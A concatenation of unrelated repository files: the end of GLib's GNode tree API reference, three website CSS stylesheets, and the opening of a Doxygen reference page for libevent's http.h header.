<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags);</pre>
<p>
Gets the number of nodes in a tree.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>root</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>flags</code></em> :</span></td>
<td>which types of children are to be counted, one of <a href="glib-N-ary-Trees.html#G-TRAVERSE-ALL:CAPS"><code class="literal">G_TRAVERSE_ALL</code></a>,
<a href="glib-N-ary-Trees.html#G-TRAVERSE-LEAVES:CAPS"><code class="literal">G_TRAVERSE_LEAVES</code></a> and <a href="glib-N-ary-Trees.html#G-TRAVERSE-NON-LEAVES:CAPS"><code class="literal">G_TRAVERSE_NON_LEAVES</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the number of nodes in the tree.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3205580"></a><h3>
<a name="g-node-n-children"></a>g_node_n_children ()</h3>
<a class="indexterm" name="id3205593"></a><pre class="programlisting"><a href="glib-Basic-Types.html#guint">guint</a> g_node_n_children (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Gets the number of children of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the number of children of <em class="parameter"><code>node</code></em>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3205671"></a><h3>
<a name="g-node-is-ancestor"></a>g_node_is_ancestor ()</h3>
<a class="indexterm" name="id3205685"></a><pre class="programlisting"><a href="glib-Basic-Types.html#gboolean">gboolean</a> g_node_is_ancestor (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *descendant);</pre>
<p>
Returns <a href="glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> if <em class="parameter"><code>node</code></em> is an ancestor of <em class="parameter"><code>descendant</code></em>.
This is true if node is the parent of <em class="parameter"><code>descendant</code></em>, or if node is the
grandparent of <em class="parameter"><code>descendant</code></em> etc.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>descendant</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>
<a href="glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> if <em class="parameter"><code>node</code></em> is an ancestor of <em class="parameter"><code>descendant</code></em>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3205834"></a><h3>
<a name="g-node-max-height"></a>g_node_max_height ()</h3>
<a class="indexterm" name="id3205848"></a><pre class="programlisting"><a href="glib-Basic-Types.html#guint">guint</a> g_node_max_height (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root);</pre>
<p>
Gets the maximum height of all branches beneath a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
This is the maximum distance from the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to all leaf nodes.
</p>
<p>
If <em class="parameter"><code>root</code></em> is <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a>, 0 is returned. If <em class="parameter"><code>root</code></em> has no children, 1 is returned.
If <em class="parameter"><code>root</code></em> has children, 2 is returned. And so on.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>root</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the maximum height of the tree beneath <em class="parameter"><code>root</code></em>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3205968"></a><h3>
<a name="g-node-unlink"></a>g_node_unlink ()</h3>
<a class="indexterm" name="id3205981"></a><pre class="programlisting">void g_node_unlink (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Unlinks a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> from a tree, resulting in two separate trees.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody><tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to unlink, which becomes the root of a new tree.
</td>
</tr></tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3206045"></a><h3>
<a name="g-node-destroy"></a>g_node_destroy ()</h3>
<a class="indexterm" name="id3206058"></a><pre class="programlisting">void g_node_destroy (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root);</pre>
<p>
Removes the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> and its children from the tree, freeing any memory
allocated.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody><tr>
<td><span class="term"><em class="parameter"><code>root</code></em> :</span></td>
<td>the root of the tree/subtree to destroy.
</td>
</tr></tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3206114"></a><h3>
<a name="g-node-push-allocator"></a>g_node_push_allocator ()</h3>
<a class="indexterm" name="id3206129"></a><pre class="programlisting">void g_node_push_allocator (<a href="glib-Basic-Types.html#gpointer">gpointer</a> dummy);</pre>
<div class="warning" style="margin-left: 0.5in; margin-right: 0.5in;">
<h3 class="title">Warning</h3>
<p><code class="literal">g_node_push_allocator</code> has been deprecated since version 2.10 and should not be used in newly-written code. It does nothing, since <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> has been converted
to the <a href="glib-Memory-Slices.html" title="Memory Slices">slice allocator</a></p>
</div>
<p>
Sets the allocator to use to allocate <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> elements.
Use <a href="glib-N-ary-Trees.html#g-node-pop-allocator"><code class="function">g_node_pop_allocator()</code></a> to restore the previous allocator.
</p>
<p>
Note that this function is not available if GLib has been compiled
with <code class="option">--disable-mem-pools</code>
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody><tr>
<td><span class="term"><em class="parameter"><code>dummy</code></em> :</span></td>
<td>the <a href="glib-Memory-Allocators.html#GAllocator"><span class="type">GAllocator</span></a> to use when allocating <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> elements.
</td>
</tr></tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3206248"></a><h3>
<a name="g-node-pop-allocator"></a>g_node_pop_allocator ()</h3>
<a class="indexterm" name="id3206263"></a><pre class="programlisting">void g_node_pop_allocator (void);</pre>
<div class="warning" style="margin-left: 0.5in; margin-right: 0.5in;">
<h3 class="title">Warning</h3>
<p><code class="literal">g_node_pop_allocator</code> has been deprecated since version 2.10 and should not be used in newly-written code. It does nothing, since <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> has been converted
to the <a href="glib-Memory-Slices.html" title="Memory Slices">slice allocator</a></p>
</div>
<p>
Restores the previous <a href="glib-Memory-Allocators.html#GAllocator"><span class="type">GAllocator</span></a>, used when allocating <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> elements.
</p>
<p>
Note that this function is not available if GLib has been compiled
with <code class="option">--disable-mem-pools</code>
</p>
</div>
</div>
</div>
</body>
</html>
|
skins/madmod1/css/screen.css
|
jmullan/Gallery1
|
/*
This is the style sheet used when Gallery running standalone and
'bars002' is selected.
If you would like to customize the styles please create
copy of this file called
"screen.css" (same name without ".default")
If that file is found in this directory it will be
used instead of this one.
Some of the styles below are overriden by specific
album properties. These are noted
$Id$
*/
/*
default text styles - background and colors overriden by
album 'bgcolor', 'background', and 'textcolor' properties.
*/
BODY
{
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10pt;
color:#404040;
font-weight:bold;
background-image: url(../images/background9.jpg);
background-color: #ffffff;
margin-top: 0px;
margin-left: 0px;
margin-right: 0px;
}
TD, P
{
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10pt;
}
/*
link colors - overridden by the album 'linkcolor' property.
*/
A { color: #404040; text-decoration: none; }
A:link { color: #404040; text-decoration: none; }
A:visited { color: #404040; text-decoration: none; }
A:active { color: #404040; }
A:hover { color: #202020; }
/*
text styles
*/
.menu /* Side menu text only */
{
line-height:140%;
padding-right:3px;
padding-left:5px;
padding_bottom:10px;
}
.menu a,
.menu a:link,
.menu a:visited,
.menu a:active
{
font-family:verdana, arial, sans-serif;
color:#404040;
font-size:9pt;
font-weight:400;
text-decoration: none;
text-align: center;
}
.menu a:hover
{
color: #381212;
text-decoration: none;
}
.onnav2 /* side menu background */
{
background-color: #c0c0c0;
height:31px;
width:138px;
border-bottom: 2px groove #606060;
border-top: 2px groove #404040;
border-left: 3px solid #00000;
border-right: 1px solid #707070;
}
.offnav2 /* side menu background */
{
background-color: #BFBFBF;
border-bottom: 3px groove #c0c0c0;
border-left: 3px groove #00000;
height:31px;
width:138px;
}
.jd_mainheader /* skin header */
{
background-image: url(../images/gallery9.jpg);
background-repeat:no-repeat;
width: 272px;
height: 75px;
}
.jd_head_left
{
background-image: url(../images/headbg9.jpg);
}
.jd_title_right
{
padding-right: 15px;
}
.jd_title_left
{
background-image: url(../images/navbg9.jpg);
}
.title /* album titles on main page */
{
line-height:140%;
padding-right:2px;
padding-left:3px;
}
.title a,
.title a:link,
.title a:visited,
.title a:active {
font-family:verdana, arial, sans-serif;
color:#000000;
font-size:x-small;
font-weight:bold;
text-decoration: none;
}
.title a:hover {
color: #900000;
text-decoration: none;
}
.mod_title /* album title Text is controled by .title */
{
background-image: url(../images/titlehead9.jpg);
width: 100%;
height: 28px;
}
.mod_title_bg /* album title hightlight Text is controled by .title */
{
}
.mod_title_right /* album title hightlight Text is controled by .title*/
{
}
.mod_title_left /* album title hightlight Text is controled by .title */
{
}
.albumdesc /*album description includes all text and background*/
{
font-family:verdana, arial, sans-serif;
color:#404040;
font-size:x-small;
font-weight:bold;
background-color: #BFBFBF;
line-height:140%;
padding:2px;
margin-top:2px;
border:1px solid #404040;
width: 80%;
height: 184px;
}
.desc /* album descriptions on main page just description and author*/
{
font-family:verdana, arial, sans-serif;
color:#404040;
font-size:x-small;
font-weight:bold;
line-height:140%;
padding:2px;
margin-top:2px;
}
.caption /* photo captions on all pages */
{
font-size: 10px;
}
.modcaption /* modifies background & caption text on album view */
{
font-family:verdana, arial, sans-serif;
color: #404040;
font-size: 10px;
font-weight:bold;
text-align: center;
line-height:140%;
padding:2px;
margin-top:2px;
border:0px dashed #404040;
}
.pview /* surrounds all info under photo view */
{
font-family:verdana, arial, sans-serif;
color: #404040;
font-size: 10px;
font-weight:bold;
line-height:140%;
background-color: #BFBFBF;
border:1px solid #404040;
}
.pcaption /* modifies background & caption text on photo view */
{
font-family:verdana, arial, sans-serif;
color: #404040;
font-size: 10px;
font-weight:bold;
line-height:140%;
padding:2px;
margin-top:2px;
background-color: #BFBFBF;
border:1px solid #404040;
}
.error /* all error text */
{
color: red;
font-size: 12px;
}
.attention /*voting instructions */
{
}
.headbox /* box around the page headers */
{
}
.head /* page headers behind the Gallery title*/
{
font-family:verdana, arial, sans-serif;
color:#404040;
font-size: 16px;
font-weight:bold;
padding-left:2px;
padding-right:2px;
line-height:140%;
border:0px dashed #404040;
height: 28px;
}
.mod_headliner /* Gallery & Album titles. Text is controled by .head */
{
}
.mod_toplight_bg /* Gallery & Album titles. Text is controled by .head */
{
}
.mod_toplight_right /* Gallery & Album titles. Text is controled by .head*/
{
}
.leftspacer /* amount of space to the left of the header and titles */
{
width: 50px;
}
.mod_toplight_left /* Gallery & Album titles. Text is controled by .head */
{
}
.bread /* used in breadcrumb bars */
{
font-size: 10px;
}
.nav /* used in navigation bars */
{
font-size: 12px;
}
.bordertop
{
}
.borderright
{
}
.borderleft
{
}
.fineprint /* used for fine print */
{
font-size: 10px;
}
.popupbody
{
margin: 25px;
background-color: #808080;
}
.popuphead
{
font-size: 14px;
font-weight: bold;
line-height: 150%;
color: #202020;
padding-left: 5px;
border-top: 1px solid #000000;
border-left: 1px solid #000000;
border-right: 1px solid #000000;
background-color: #c0c0c0;
}
.popup
{
font-size: 12px;
font-weight: normal;
color: #202020;
padding: 5px;
border: 1px solid #000000;
background-color: #ffffff;
margin-bottom: 10px;
}
.popupform
{
font-size: 12px;
font-weight: normal;
line-height: 120%;
color: #202020;
padding: 2px;
border: 1px solid #000000;
background-color: #c0c0c0;
}
.vapoll
{
border: 1px solid #404040;
background-color: #BFBFBF;
padding: 7px;
}
.vathumbs /* full background bracket for images and text - veiw albums */
{
border: 1px solid #404040;
background-color: #BFBFBF;
padding: 7px;
}
.vatable /* width of the div set for all photo sets - view albums */
{
width: 100%;
}
.vafloat /* float for view album - text */
{ float: left;
padding: 5px;
}
.vafloat2 /* float for view album - images */
{
padding: 5px;
float: left;
}
.editlink, /* Used for the [edit] tags */
.editlink a,
.editlink a:link,
.editlink a:visited,
.editlink a:active
{
font-size: 10px;
font-weight: normal;
color: #404040;
}
.modnavbox /* main navigation bar next and previous */
{
font-family:verdana, arial, sans-serif;
color:#404040;
font-size: 12px;
font-weight:bold;
line-height:140%;
}
.modnavbox a,
.modnavbox a:link,
.modnavbox a:visited,
.modnavbox a:active {
font-weight: normal;
color:#404040;
text-decoration: none;
}
.modnavbox a:hover {
font-weight: normal;
color: #900000;
text-decoration: underline;
}
.admin
{
font-size: 10px;
font-weight: bold;
color: #404040;
}
.adminform {
font-size: 10px;
font-weight: bold;
color: #404040 ;
}
.search /* used in admin bars - the search text*/
{
font-size: 10px;
color: #404040;
font-weight: bold;
}
.modnavboxtop /*navagation bar top of screen where admin buttons show*/
{
font-family:verdana, arial, sans-serif;
color: #404040;
font-size: 10px;
font-weight:bold;
background-color: #BFBFBF;
line-height:140%;
border:0px dashed #404040;
width: 100%
}
.modnavboxtop a,
.modnavboxtop a:link,
.modnavboxtop a:visited,
.modnavboxtop a:active {
font-weight: normal;
color: #404040;
text-decoration: none;
}
.modnavboxtop a:hover {
font-weight: normal;
color: #900000;
text-decoration: none;
}
.modnavboxmid /*navagation bar middle where the link for the albums show*/
{
font-family:verdana, arial, sans-serif;
color: #404040;
font-size: 10px;
font-weight:bold;
background-color: #BFBFBF;
line-height:140%;
border:0px dashed #404040;
width: 100%
}
.modnavboxmid a,
.modnavboxmid a:link,
.modnavboxmid a:visited,
.modnavboxmid a:active {
font-weight: normal;
color:#404040;
text-decoration: none;
}
.modnavboxmid a:hover {
font-weight: normal;
color: #900000;
text-decoration: underline;
}
.modfooter /*footer where the Gallery version is located*/
{
font-family:verdana, arial, sans-serif;
color:#404040;
font-size: 8px;
font-weight:normal;
line-height:140%;
padding:2px;
border:0px dashed #404040;
width:100%
}
.modfooter a,
.modfooter a:link,
.modfooter a:visited,
.modfooter a:active {
color:#ffffff;
text-decoration: none;
}
.modfooter a:hover {
color: #900000;
text-decoration: none;
}
#adminbox {
background-color: #c0c0c0;
}
#adminbox td {
background-color: #c0c0c0;
padding: 2px;
}
|
public/stylesheets/assets/show.css
|
xlsuite/xlsuite
|
#download-selector {padding: .5em; border: 1px solid #ddd; display: block; height: 50px;}
#download-selector > span { font-weight: bold; position: relative; top: .5em; }
#download-selector > * { float: left; }
#download-selector ul { list-style-type: none; }
#download-selector li { display: block; width: 8em; padding: 0 2em; }
#download-selector li span { display: block; text-align: center; }
#download-selector a { display: block; float: left; }
.container { clear: both; padding: 1em 0; }
img.view { float: left; clear:left; padding: 3px; border: 1px solid #8abb46; margin-right: 1em; margin-bottom: 1em;}
.container .description p { margin: .5em 0; line-height: 1.1; font-size: 0.9em; }
.container .description p:first-child { margin-top: 0; }
.fields { font-size: .9em; }
.fields dt { float: left; font-weight: bold; width: 7em; }
#asset_title { font-weight: bold; font-size: 1.3em; padding-left: 20px; display: block; width: 100%; height: 2em;}
#asset_title .show {padding: 1px 1px 2px 2px; display: block; border: 1px solid #fff; margin-bottom: .5em;}
#asset_title input { font-size: 1em; font-weight: bold; width: 30em; margin-bottom: .5em; }
#asset_title .throbber { display: absolute; left: 0; top: 0; }
.actions { margin-top: 2em; }
.action a { display: block; }
.asset_description {float: left; width: 300px; font-size: 11px;}
.description .show {}
.description .edit {}
.fields {clear: both;}
.fields dd ul { list-style-type: none; }
|
wp-content/themes/DressRoom/css/header.css
|
Artenka/DressRoom
|
@import url(http://fonts.googleapis.com/css?family=Exo+2:600&subset=latin,cyrillic);
.header {
width: 100%;
background: white;
margin: 0 auto;
background: #fffced;
}
.header h1{
width: 1000px;
margin: 0 auto;
text-align: center;
margin-top:5px;
padding-top:20px;
padding-bottom:20px;
}
#main h1{
width: 1000px;
margin: 0 auto;
text-align: center;
margin-top:5px;
padding-top:20px;
padding-bottom:20px;
}
|
doc/html/http_8h.html
|
diy19901030/lldpd
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>lldp: /home/evan/lldpd-0.7.11/libevent/include/event2/http.h File Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">lldp
 <span id="projectnumber">0.7.11</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- Generated by Doxygen 1.7.6.1 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="modules.html"><span>Modules</span></a></li>
<li><a href="annotated.html"><span>Data Structures</span></a></li>
<li class="current"><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>Globals</span></a></li>
</ul>
</div>
</div>
<div class="header">
<div class="summary">
<a href="#define-members">Defines</a> |
<a href="#enum-members">Enumerations</a> |
<a href="#func-members">Functions</a> </div>
<div class="headertitle">
<div class="title">/home/evan/lldpd-0.7.11/libevent/include/event2/http.h File Reference</div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><code>#include <<a class="el" href="util_8h_source.html">event2/util.h</a>></code><br/>
</div><div class="textblock"><div class="dynheader">
Include dependency graph for http.h:</div>
<div class="dyncontent">
<div class="center"><img src="http_8h__incl.png" border="0" usemap="#_2home_2evan_2lldpd-0_87_811_2libevent_2include_2event2_2http_8h" alt=""/></div>
<map name="_2home_2evan_2lldpd-0_87_811_2libevent_2include_2event2_2http_8h" id="_2home_2evan_2lldpd-0_87_811_2libevent_2include_2event2_2http_8h">
</map>
</div>
</div><div class="textblock"><div class="dynheader">
This graph shows which files directly or indirectly include this file:</div>
<div class="dyncontent">
<div class="center"><img src="http_8h__dep__incl.png" border="0" usemap="#_2home_2evan_2lldpd-0_87_811_2libevent_2include_2event2_2http_8hdep" alt=""/></div>
<map name="_2home_2evan_2lldpd-0_87_811_2libevent_2include_2event2_2http_8hdep" id="_2home_2evan_2lldpd-0_87_811_2libevent_2include_2event2_2http_8hdep">
</map>
</div>
</div>
<p><a href="http_8h_source.html">Go to the source code of this file.</a></p>
<table class="memberdecls">
<tr><td colspan="2"><h2><a name="define-members"></a>
Defines</h2></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a02e6d59009dee759528ec81fc9a8eeff">HTTP_OK</a>   200</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ac5e3a483119375a05d199c30709f2b8e">HTTP_NOCONTENT</a>   204</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ac6ffbb7b69889f1eee0d413576c609a9">HTTP_MOVEPERM</a>   301</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a7d2a7341ba2af15babe8c25df67e563f">HTTP_MOVETEMP</a>   302</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a3112d58297965db46a04fe288bf1d0da">HTTP_NOTMODIFIED</a>   304</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#af9f070802de32cd2f820059fc42cbf39">HTTP_BADREQUEST</a>   400</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a1f5b9c02b018640c890e5f27207fa6c0">HTTP_NOTFOUND</a>   404</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a8d93bc2b08ddc194c213682c4726b0e6">HTTP_BADMETHOD</a>   405</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a64236d9bad703199d84a08bee90e00f0">HTTP_ENTITYTOOLARGE</a>   413</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a4eac9f52d3d8de9b3deadaec6ad0bee9">HTTP_EXPECTATIONFAILED</a>   417</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a15eac402986428a8125d364b7ae569b1">HTTP_INTERNAL</a>   500</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a9759dd4ad026a688142afb7b4e4542cc">HTTP_NOTIMPLEMENTED</a>   501</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a5fd6829fe2bb38dd13288f11dcb2025f">HTTP_SERVUNAVAIL</a>   503</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">#define </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ace576911d436a163584f4942907270a5">EVHTTP_URI_NONCONFORMANT</a>   0x01</td></tr>
<tr><td colspan="2"><h2><a name="enum-members"></a>
Enumerations</h2></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">enum  </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ac858319d667267f9fc848c2bb6931aa3">evhttp_cmd_type</a> { <br/>
  <b>EVHTTP_REQ_GET</b> = 1 << 0,
<b>EVHTTP_REQ_POST</b> = 1 << 1,
<b>EVHTTP_REQ_HEAD</b> = 1 << 2,
<b>EVHTTP_REQ_PUT</b> = 1 << 3,
<br/>
  <b>EVHTTP_REQ_DELETE</b> = 1 << 4,
<b>EVHTTP_REQ_OPTIONS</b> = 1 << 5,
<b>EVHTTP_REQ_TRACE</b> = 1 << 6,
<b>EVHTTP_REQ_CONNECT</b> = 1 << 7,
<br/>
  <b>EVHTTP_REQ_PATCH</b> = 1 << 8
<br/>
}</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">enum  </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a47ca41a942899d019bf59cf32301ae4f">evhttp_request_kind</a> { <b>EVHTTP_REQUEST</b>,
<b>EVHTTP_RESPONSE</b>
}</td></tr>
<tr><td colspan="2"><h2><a name="func-members"></a>
Functions</h2></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp.html">evhttp</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ab8c84271a97fd85957cf72b1161b8216">evhttp_new</a> (struct <a class="el" href="structevent__base.html">event_base</a> *base)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a80ea2b819c0997a0ecc0d915446aeaa4">evhttp_bind_socket</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, const char *address, ev_uint16_t port)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a7b2e494399364cfb8071e69564c33db9">evhttp_bind_socket_with_handle</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, const char *address, ev_uint16_t port)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#aa5719654012b143ebfc0dfc9d4a8490d">evhttp_accept_socket</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, <a class="el" href="util_8h.html#a7ef0023565082a65020f6e56be59fd0b">evutil_socket_t</a> fd)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ae0b17d7e600e87cadda2352ea2135d8f">evhttp_accept_socket_with_handle</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, <a class="el" href="util_8h.html#a7ef0023565082a65020f6e56be59fd0b">evutil_socket_t</a> fd)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#aa86abe883e71049f03534d984dd8c625">evhttp_bind_listener</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, struct <a class="el" href="structevconnlistener.html">evconnlistener</a> *listener)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevconnlistener.html">evconnlistener</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a7b9ba15b143ece0f69a2b4c52ff9d788">evhttp_bound_socket_get_listener</a> (struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a> *bound)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a5404c30f3b50a664f2ec1500ebb30d86">evhttp_del_accept_socket</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a> *bound_socket)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="el" href="util_8h.html#a7ef0023565082a65020f6e56be59fd0b">evutil_socket_t</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a5b5912e3d764bbd8f4952aba0f0604fa">evhttp_bound_socket_get_fd</a> (struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a> *bound_socket)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a849acf0f233772b486b8057fcf3aaf4a">evhttp_free</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ae936aa6e7b0cb9617d0548a952db93cf">evhttp_set_max_headers_size</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, ev_ssize_t max_headers_size)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a8406065dcb34f9a058b2a7a6988ac351">evhttp_set_max_body_size</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, ev_ssize_t max_body_size)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ae63a0370f59570e00753f7fb512a7f59">evhttp_set_allowed_methods</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, ev_uint16_t methods)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a5b685afe43d7f4c3bfcc7dcba72d41e0">evhttp_set_cb</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, const char *path, void(*cb)(struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *, void *), void *cb_arg)</td></tr>
